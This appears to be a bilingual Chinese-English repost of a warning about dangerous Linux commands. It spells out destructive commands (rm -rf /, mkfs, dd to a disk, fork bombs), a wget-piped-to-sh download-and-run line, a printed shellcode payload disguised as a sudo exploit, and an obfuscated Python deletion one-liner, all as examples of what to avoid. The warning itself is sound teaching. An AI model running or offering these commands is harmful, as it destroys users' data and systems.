不要执行的linux命令

Delete all files, delete current directory, and delete visible files incurrent directory. It's quite obvious why these commands can bedangerous to execute.
下列命令会删除所有文件, 删除当前目录, 删除当前目录下面的文件.
代码: rm    -rf /rm -rf .rm -rf
 * Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
下列命令会摧毁整个文件系统, 重建分区.
代码: mkfs   mkfs.ext3       mkfs.anything
Block device manipulation: Causes raw data to be written to a blockdevice. Often times this will clobber the filesystem and cause totalloss of data:
下列命令会清空整个硬盘.
代码: any_command > /dev/sdadd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes,forcing you to do a hard reset which may cause corruption, data damage,or other awful fates.In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
 下列命令会启动大量进程, 导致系统无法响应, 只能硬重启机器, 可能会导致数据损害. 代码: :(){:|:&};: In Perl
代码: fork while fork
 Tarbomb: Someone asks you to extract a tar archive into an existingdirectory. This tar archive can be crafted to explode into a millionfiles, or inject files into the system by guessing filenames. Youshould make the habit of decompressing tars inside a cleanly madedirectoryDecompression bomb: Someone asks you to extract an archive whichappears to be a small download. In reality it's highly compressed dataand will inflate to hundreds of GB's, filling your hard drive. Youshould not touch data from an untrusted sourceShellscript: Someone gives you the link to a shellscript toexecute. This can contain any command he chooses -- benign ormalevolent. Do not execute code from people you don't trust
不要执行你不信任的人提供的shell脚本, 里面可能含有危险的命令和脚本, 不要随意解压别人提供的压缩包, 也许看起来很小, 结果解压出来会塞满整个硬盘.
代码: wget http://some_place/some_filesh ./some_file
代码: wget http://some_place/some_file -O- | sh
 Compiling code: Someone gives you source code then tells you tocompile it. It is easy to hide malicious code as a part of a large wadof source code, and source code gives the attacker a lot morecreativity for disguising malicious payloads. Do not compile OR executethe compiled code unless the source is of some well-known application,obtained from a reputable site (i.e. SourceForge, the author'shomepage, an Ubuntu address).A famous example of this surfaced on a mailing list disguised as aproof of concept sudo exploit claiming that if you run it, sudo grantsyou root without a shell. In it was this payload:
不要编译运行别人提供的不明代码
代码: char esp[] __attribute__ ((section(".text"))) /* e.s.prelease */                = "/xeb/x3e/x5b/x31/xc0/x50/x54/x5a/x83/xec/x64/x68"                  "/xff/xff/xff/xff/x68/xdf/xd0/xdf/xd9/x68/x8d/x99"                  "/xdf/x81/x68/x8d/x92/xdf/xd2/x54/x5e/xf7/x16/xf7"                  "/x56/x04/xf7/x56/x08/xf7/x56/x0c/x83/xc4/x74/x56"                  "/x8d/x73/x08/x56/x53/x54/x59/xb0/x0b/xcd/x80/x31"                  "/xc0/x40/xeb/xf9/xe8/xbd/xff/xff/xff/x2f/x62/x69"                  "/x6e/x2f/x73/x68/x00/x2d/x63/x00"                  "cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;";
To the new or even lightly experienced computer user, this lookslike the "hex code gibberish stuff" that is so typical of a safeproof-of-concept. However, this actually runs rm -rf ~ / & whichwill destroy your home directory as a regular user, or all files asroot. If you could see this command in the hex string, then you don'tneed to be reading this announcement. Otherwise, remember that thesethings can come in very novel forms -- watch out.Again, recall these are not at all comprehensive and you should notuse this as a checklist to determine if a command is dangerous or not!For example, 30 seconds in Python yields something like this:
代码: python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))' Where "sn!.sg!+" is simply rm -rf * shifted a character up. Ofcourse this is a silly example -- I wouldn't expect anyone to befoolish enough to paste this monstrous thing into their terminalwithout suspecting something might be wrong.